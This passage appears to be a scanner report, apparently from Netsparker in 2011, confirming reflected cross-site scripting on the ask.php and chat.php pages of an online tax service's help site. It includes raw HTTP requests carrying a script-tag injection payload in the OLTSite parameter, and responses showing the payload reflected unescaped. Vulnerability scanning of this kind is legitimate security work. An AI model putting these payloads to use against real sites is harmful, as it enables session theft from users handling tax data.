(!obj.document.getElementById('session_frameset')) { if (!obj.opener && !obj.parent && !obj.document.getObjectById('session_frameset')) //Not session window at origin return(obj); if (obj.opener) obj = obj.opener; else if (obj.parent) obj = obj.parent; } if (obj.document.getElementById('session_frameset')) return(obj); else alert('Did not find Session Frameset');}// ----------------------------------------------------------------------------var dtu = new Array("MINUTES0", "HOURS0", "HOURS1", "DAYS0", "DAYS1", "WEEKS0", "WEEKS1", "MONTHS0", "MONTHS1", "QUARTERS0", "QUARTERS1", "YEARS0", "YEARS1");function js_topairs(rstr){ var pstr = ''; var re = /,/g; var divpat = /(.+):(.+)=(.+)/; var dtpat = /(.+)=(.*)\|(.+|$)/; var fceqpat = /(.+)=(.+)/; var ordpat = /(.+)=(.+):(.+);(.+):(.+)/; var tstr = '', ttype = ''; var df = new Array(5); var dt = new Array(5); var from_str, to_str; var ttype_set = false; var cnt = 1; var pfx1 = '$qryargs["search_args"]["search_field'; var pfx2 = '"]=array("name"=>"'; var seq = '","compare_value"=>"'; var trimseq = '","compare_value"=>trim(unescape("'; var dtseq = '","compare_value"=>'; var trimopo = '")),"oper_id"=>intval("1"));'; var opo = '","oper_id"=>intval("1"));'; var mkstr = "mktime("; var date_re = /(\d+)\s+\/\s+(\d+)\s+\/\s+(\d+)/; var dt_re = /(\d+)\s+\/\s+(\d+)\s+\/\s+(\d+)\s+(\d+)\s*:\s*(\d+)/; // document.body.style.cursor = 'wait'; part = rstr.split('||'); for (i = 0, pl = part.length; i < pl; i++) { if (part[i].substr(1,3) == 'div') { res = part[i].match(divpat); if (res) pstr += pfx1 + cnt++ + pfx2 + res[2] + seq + res[3] + '","oper_id"=>intval("' + ((res[3] == '~null~') ? 12 : (res[3] == '~notnull~') ? 13 : 10) + '"));'; } else if (part[i].substr(0,8) == 'date_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(',,'); for (j = 0, tl = tmp.length -1 ; j < tl; j++) { from_str = to_str = ''; res = tmp[j].match(dtpat); if (res[2] != '') { if (res[2].indexOf("/") != -1) { dp = res[2].match(date_re); from_str = mkstr + '0,0,0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[2].split(':'); tmpstr = dtu[parseInt(rp[2])]; from_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (res[3] != '') { if (res[3].indexOf("/") != -1) { dp = res[3].match(date_re); to_str = mkstr + '0,0,0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; // to_str = 'datestr2time("' + res[3] + '")'; } else { rp = res[3].split(':'); tmpstr = dtu[parseInt(rp[2])]; to_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (from_str == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + to_str + ',"oper_id"=>intval("4"));'; else if (to_str == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ',"oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ". '|' . " + to_str + ',"oper_id"=>intval("9"));'; } } else if (part[i].substr(0,6) == 'dt_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(',,'); for (j = 0, tl = tmp.length -1 ; j < tl; j++) { from_str = to_str = ''; res = tmp[j].match(dtpat); if (res[2] != '') { if (res[2].indexOf("/") != -1) { dp = res[2].match(dt_re); if(dp) from_str = mkstr + dp[4]+','+dp[5]+',0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[2].split(':'); tmpstr = dtu[parseInt(rp[2])]; from_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (res[3] != '') { if (res[3].indexOf("/") != -1) { dp = res[3].match(dt_re); if(dp) to_str = mkstr + dp[4]+','+dp[5]+',0,'+dp[1]+',' +dp[2]+','+dp[3]+')'; } else { rp = res[3].split(':'); tmpstr = dtu[parseInt(rp[2])]; to_str = "\"DATE_ADD('" + ((parseInt(rp[2]) < 3) ? 'NOW' : 'TODAY') + "', " + rp[0] + rp[1] + ', ' + tmpstr.substr(0,tmpstr.length-1) + ', ' + tmpstr.substr(tmpstr.length-1,1) + ')"'; } } if (from_str == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + to_str + ',"oper_id"=>intval("4"));'; else if (to_str == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ',"oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + dtseq + from_str + ". '|' . " + to_str + ',"oper_id"=>intval("9"));'; } } else if (part[i].substr(0,7) == 'int_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2] + '", "oper_id"=>intval("9"));'; } } else if (part[i].substr(0,7) == 'cur_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); cval = res[2].split('|'); if (cval[0] == '') // no from, oper <= pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + cval[1] + '", "oper_id"=>intval("4"));'; else if (cval[1] == '') // no to, oper >= pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + cval[0] + '", "oper_id"=>intval("6"));'; else // from and to, oper between pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2] + '", "oper_id"=>intval("9"));'; } } else if (part[i].substr(0,8) == 'text_str') { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); for (j = 0, tl = tmp.length - 1; j < tl; j++) { res = tmp[j].match(fceqpat); pstr += pfx1 + cnt++ + pfx2 + res[1] + trimseq + escape(res[2]) + trimopo; } } else if (part[i].substr(0,8) == 'orderby1') { if (part[i].indexOf('dflt') == -1) { res = part[i].match(ordpat); if (res[4] != 0) // 2nd level order pstr += "$p_gridsort=&quot;" + res[2] + ":" + res[3] + ";" + res[4] + ":" + res[5] + "&quot;; $qryargs[&quot;orderby_args&quot;][&quot;order_field1&quot;]=array(&quot;display_col&quot;=>&quot;" + res[2] + "&quot;,&quot;direction&quot;=>&quot;" + res[3] + "&quot;); $qryargs[&quot;orderby_args&quot;][&quot;order_field2&quot;]=array(&quot;display_col&quot;=>&quot;" + res[4] + "&quot;,&quot;direction&quot;=>&quot;" + res[5] + "&quot;);"; else pstr += "$p_gridsort=&quot;" + res[2] + ":" + res[3] + ";&quot;; $qryargs[&quot;orderby_args&quot;][&quot;order_field1&quot;]=array(&quot;display_col&quot;=>&quot;" + res[2] + "&quot;,&quot;direction&quot;=>&quot;" + res[3] + "&quot;);"; } else pstr += "$p_gridsort=&quot;&quot;;" } else if (part[i].substr(0,5) == 'limit') { pstr += '$limit=min(' + part[i].split('=')[1] + ', $vrl_hard);'; } else // multi-select { tmp = part[i].substr(part[i].indexOf('=') + 1).split(','); res = part[i].match(fceqpat); if (res) pstr += pfx1 + cnt++ + pfx2 + res[1] + seq + res[2].replace(/,/g, ';') + '","oper_id"=>intval("' + ((res[2] == '~null~') ? 12 : (res[2] == '~notnull~') ? 13 : 10) + '"));'; } } return(pstr);}// ----------------------------------------------------------------------------function size_dialog(win, divobj){ win.external.SetDlgSize(divobj.offsetWidth + 34, divobj.offsetHeight + 38);}// ----------------------------------------------------------------------------function obj_prop_cnt(obj){ var i, rv = 0; for (i in obj) rv++; return(rv);}// ----------------------------------------------------------------------------function obj_empty(obj){ var i; for (i in obj) return(false); return(true);}// ----------------------------------------------------------------------------function pairs2str(pairs, append_data){ var p = new Array..
- /cgi-bin/olt.cfg/php/enduser/ask.php

/cgi-bin/olt.cfg/php/enduser/ask.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/ask.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x00067F)</script>
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/ask.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00067F)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:55:01 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=71901 t=1304117701301388
RNT-Machine: 04
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 11720
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en_US"><!-- Head ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><head><meta http-equiv="Pragma" content="no-cache"/><meta http-equiv="Expires" content="-1"/><meta name="robots" content="noindex,nofollow"><link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"><title>Ask a Question</title><script type="text/javascript" src="/rnt/rnw/javascript/enduser.js" language="JavaScript"></script><script type="text/javascript">var _dflt_sub_product = '-- ';var _dflt_sub_category = '-- ';var _fields = new Array (new field('p_userid', "Username or Email Address", 5, 80, 1),new field('p_subject', "Subject", 5, 240, 1), new field('p_question', "Question", 6, 0, 1),new field('p_icf_8', "Taxpayer name", 5, 40, 0),new field('p_icf_9', "Taxpayer SSN", 5, 4, 0),new field('p_icf_10', "Username", 5, 20, 0),new field('', '', 0, 0, 0));var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:");// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -var _fasubmit = false;var _submit_accepted = false;function _putCustomFieldMasks(formName){ for(i = 0; i < _fields.length; i++) if(_fields[i].name.match('_icf_')) if(document[formName]['custom_text_' + _fields[i].name]) put_mask(_fields[i].name, document[formName]['custom_text_' + _fields[i].name].value, document[formName], 0); else if(document[formName]['custom_text_lh_' + _fields[i].name]) { put_mask(_fields[i].name, document[formName]['custom_text_lh_' + _fields[i].name].value, document[formName], 0); document.getElementById(_fields[i].name + '_mask').innerHTML=''; }}//-----------------------------------------------------------------------------function _do_submit(form){ var chk_val = true; if (_submit_accepted) // prevents NN4 resubmission return(false); if (_fasubmit) { if (!form.p_new_fattach.value.length) { form.p_new_fattach.focus(); alert("No file attachment name specified."); } chk_val = (form.p_new_fattach.value.length > 0); } if (!_fasubmit) { chk_val = chk_val && _check_fields(form.name, fld_data, _fields); chk_val = chk_val && prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0); } form.submit_btn.disabled = chk_val; _submit_accepted = chk_val; if (form.add_fattach && chk_val) { form.add_fattach.disabled = true; if (form.p_new_fattach.value.length == 0) form.p_single_file.value = 0; if (_fasubmit) form.p_add_fattach.value = 1; else if (form.p_new_fattach.value.length > 0) form.p_single_file.value = 1; } return(chk_val);}// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -function _hier_popup(tname){ window.open('hier_disp.php?p_sid=nowO2Ksk&p_accessibility=0&p_redirect=3&p_lva=&p_li=&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&p_srch_pg=ask.php&p_ask=1&p_tbl='+tname, 'hier_popup', 'scrollbars,resizable,width=550,height=700');}</script></head><!-- Body ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><body class="bgcolor"><body topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" bgcolor="#ffffff" text="#000000" link="#000000" vlink="#000000" alink="#000000"><table height="100" cellSpacing="0" cellPadding="0" width="790" border="0"> <tr> <td vAlign="bottom"> <table cellSpacing="0" cellPadding="0" width="100%" background="https://www.olt.com/main/home/images/tile-hdr.gif" border="0"> <tr> <td rowSpan="2"><img height="95" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> <td rowSpan="2"><img src="https://www.olt.com/main/home/images/hdr-logo-home.gif" alt="Online Taxes OLT Logo" title="Online Taxes OLT Logo" width="200" height="95"></td> <td align="right" width="100%"><img src="https://www.olt.com/main/home/images/hdr-slogan.gif" alt="Online Taxes slogan - Simple fast Secure" title="Online Taxes Slogan - Simple Fast Accurate" width="175" height="40"></td> <td><img height="40" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> <tr> <td class="hdrnav" vAlign="top" align="right"><nobr><a href="https://www.olt.com/main/home/default.asp">Home</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/about.asp">About Us</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/products.asp">Products</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/service.asp">Customer Service</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/states.asp">States</a> &nbsp;|&nbsp; <a href="https://www.olt.com/main/home/taxcorner.asp">Tax Corner</a></nobr></td> <td><img height="55" src="https://www.olt.com/main/home/images/spacer.gif" width="10"></td> </tr> </table> </td> </tr> </table><table><tr><td width="790"><br /><form class="block" name="_main" method="post" action="ask_submit.php?p_sid=nowO2Ksk&amp;p_accessibility=0&amp;p_redirect=3&amp;p_lva=&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x&amp;p_li=" enctype="multipart/form-data" onsubmit=" add_prodcat_vals(document._main, prod_array, cat_array); return(_do_submit(this))"><input type="hidden" name="p_add_fattach" value="" /><input type="hidden" name="p_single_file" value="0" /><input type="hidden" name="p_prodnames" value="" /><input type="hidden" name="p_catnames" value="" /><input type="hidden" name="p_sid" value="nowO2Ksk" /><input type="hidden" name="p_lva" value="" /><input type="hidden" name="p_sp" value="cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x" /><input type="hidden" name="p_li" value="" /><input type="hidden" name="p_accessibility" value="0" /><input type="hidden" name="p_redirect" value="3" /><input type="hidden" name="p_token" value="Yp1om2CRaAd0nXCZfJ94l0SdQJ1MkUiRVJ~OnZ0!" /><!-- Tab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --><table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;answers&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;answers&nbsp;_tab_link" href="std_alp.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00067F)%5C/script%5E&p_sid=nowO2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;Answers&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/seltabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="seltab" name="ask_a_question_tab" align="center" rowspan="2" nowrap> <a class="seltab" name="ask_a_question_tab_link" href="ask.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00067F)%5C/script%5E&p_sid=nowO2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Ask a Question</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/seltabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="seltab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="live_help_tab" align="center" rowspan="2" nowrap> <a class="tab" name="live_help_tab_link" href="chat.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00067F)%5C/script%5E&p_sid=nowO2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">Live Help</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="1%" valign="bottom"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td align="left" valign="top"><img src="/rnt/rnw/img/enduser/tabl.gif" width="6" height="6" alt="" /></td> <td width="100%" class="tab" name="&nbsp;my_stuff&nbsp;_tab" align="center" rowspan="2" nowrap> <a class="tab" name="&nbsp;my_stuff&nbsp;_tab_link" href="myovr.php?OLTSite=OLTFree73541'"--%5E%5C/style%5E%5C/script%5E%5Cscript%5Enetsparker(0x00067F)%5C/script%5E&p_sid=nowO2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x">&nbsp;My Stuff&nbsp;</a> </td> <td align="right" valign="top"><img src="/rnt/rnw/img/enduser/tabr.gif" width="6" height="6" alt="" /></td> </tr> <tr> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> <td class="tab"><img src="/rnt/rnw/img/trnsp.gif" width="6" height="14" alt="" /></td> </tr> </table> </td> <td width="1%">&nbsp;</td> <td width="80%"> <a href="accessibility.php?p_accessibility=0&p_redirect=3"> hide accessible links </a> &nbsp;</td> <td width="1%" valign="bottom"> <table width="1%" cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1%" class="tabbtn" align="left" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> <td width="2%" name="_tab" class="tabbtn" align="center" valign="middle" nowrap rowspan="2"> <a class="tabbtn" href="help_general.php?OLTSite=OLTFree73541'"--></style></script><script>netsparker(0x00067F)</script>&p_sid=nowO2Ksk&amp;p_accessibility=1&amp;p_redirect=3&amp;p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x"> &nbsp;&nbsp;Help&nbsp;&nbsp; </a> </td> <td width="1%" class="tabbtn" align="right" valign="top"><img src="/rnt/rnw/img/trnsp.gif" width="1" height="6" alt="" /></td> </tr> <tr> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> <td class="tabbtn"> <img src="/rnt/rnw/img/trnsp.gif" width="1" height="14" alt="" /> </td> </tr> </table> </td> </tr><!-- Subtab Area ->>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>- --> <tr> <td class="seltab" colspan="..
- /cgi-bin/olt.cfg/php/enduser/chat.php

/cgi-bin/olt.cfg/php/enduser/chat.php CONFIRMED

https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541%00%27%22--%3E%..

Parameters

Parameter Type Value
OLTSite GET OLTFree73541'"--></style></script><script>alert(0x0006C5)</script>
p_sid GET TyYLtJsk
p_accessibility GET 0
p_redirect GET 3
p_sp GET cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x

Request

GET /cgi-bin/olt.cfg/php/enduser/chat.php?OLTSite=OLTFree%0073541%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0006C5)%3C%2Fscript%3E&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=3&p_sp=cF9zcmNoPSZwX3NvcnRfYnk9JnBfZ3JpZHNvcnQ9JnBfcm93X2NudD0xMzY2LDEzNjYmcF9wcm9kcz0mcF9jYXRzPSZwX3B2PSZwX2N2PSZwX3NlYXJjaF90eXBlPWFuc3dlcnMuc2VhcmNoX25sJnBfcGFnZT0x HTTP/1.1
Referer: https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/std_alp.php?OLTSite=OLTFree%0073541&p_sid=TyYLtJsk&p_accessibility=0&p_redirect=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: olt.custhelp.com
Cookie: rnw_accessibility=1; rnw_enduser_login_start=LOGIN_START
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:55:36 GMT
Server: Apache
P3P: policyref="https://olt.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
RNT-Time: D=75923 t=1304117736028288
RNT-Machine: 01
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4323
X-Cnection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><script type="text/javascript">var $ = getItem; function getItem(id){ return document.getElementById(id);}// This function contained in util.phph; this should be prunedfunction strip_format(vstr, mask_fld){ var i, j, ln = mask_fld.length, dstr; if (!ln || !vstr) return(vstr); for (i = j = 0, dstr = ''; i < ln; i++) { if (mask_fld.charAt(i++) == 'F') j++; else dstr += vstr.charAt(j++); } return(dstr);}function verifyAndLaunch(form){ var cfInput; add_prodcat_vals(form); if(!verifyData(form)) return false;//Copy field values from form input fields into their hidden field counterparts. This is being done primarily so we can strip any masked fields//before sending. $('_icf_8').value = $('_input_icf_8').value; $('_icf_9').value = $('_input_icf_9').value; $('_icf_10').value = $('_input_icf_10').value; launchChat(); form.submit();}function verifyData(form){ if(!_check_fields(form.name, fld_data, chat_fields)) return false; if(!prodcat_check_fields(form.name, fld_data, form.p_prods.value, form.p_cats.value, 1, 0)) return false; return true;}function launchChat(){ var leftPos = (screen.width / 2) - 325; var topPos = (screen.height / 2) - 265; chatWindow = window.open('about:blank', 'chatWindow', 'status=1,toolbar=0,menubar=0,location=0,resizable=1,height=530px,width=640px,left=' + leftPos + ',top=' + topPos);}</script><html lang="en_US"> <head> <meta http-equiv="Pragma" content="no-cache"/> <meta http-equiv="Expires" content="-1"/> <meta name="robots" content="noindex,nofollow"> <link rel="stylesheet" type="text/css" href="https://www.olt.com/main/home/styles.css" /><link rel="stylesheet" type="text/css" href="/rnt/rnw/css/enduser.css"> <title>Live Assistance</title> <script type="text/javascript" src="/rnt/rnw/javascript/enduser.js"></script> <script type="text/javascript"> var fld_data = new field_data("is not an integer.","requires a value.","is not completely specified.","The text entered for \'%s\' exceeds its size limit of %d characters by %d characters.","must only contain valid ascii characters.","does not seem to be a valid email address.","Must contain valid furigana characters","Need to select more options.","Need to select fewer options.","Month","Day","Year","Hour","Minute","(([-!#$%&\'*+/=?^~`{|}\\w]+(\\.[-!#$%&\'*+/=?^~`{|}\\w]+)*)|(\"[^\"]+\"))@[0-9A-Za-z]+(-[0-9A-Za-z]+)*(\\.[0-9A-Za-z]+(-[0-9A-Za-z]+)*)+",0,2010,"must not contain either \'<\' or \'>\'","cannot be negative","Field contains too many characters.","Must contain a valid format character.","is not a valid format character.","Must contain a valid number.","is not a valid number.","Must contain a valid alpha-numeric.","is not a valid alpha-numeric.","Must contain a valid letter.","is not a valid letter.","Must contain a valid character.","is not a valid character.","The correct format is","The value you have entered is less than the smallest value allowed for this field.","The value you have entered is greater than the largest value allowed for this field.","is not a valid date.","is not a valid date. Please enter a date in format","MM","DD","YYYY","Minimum year is:","Maximum year is:"); function putCustomFieldMasks(formName) { for(i = 0; i < chat_fields.length; i++) if(chat_fields[i].name.match('_input_icf_')) 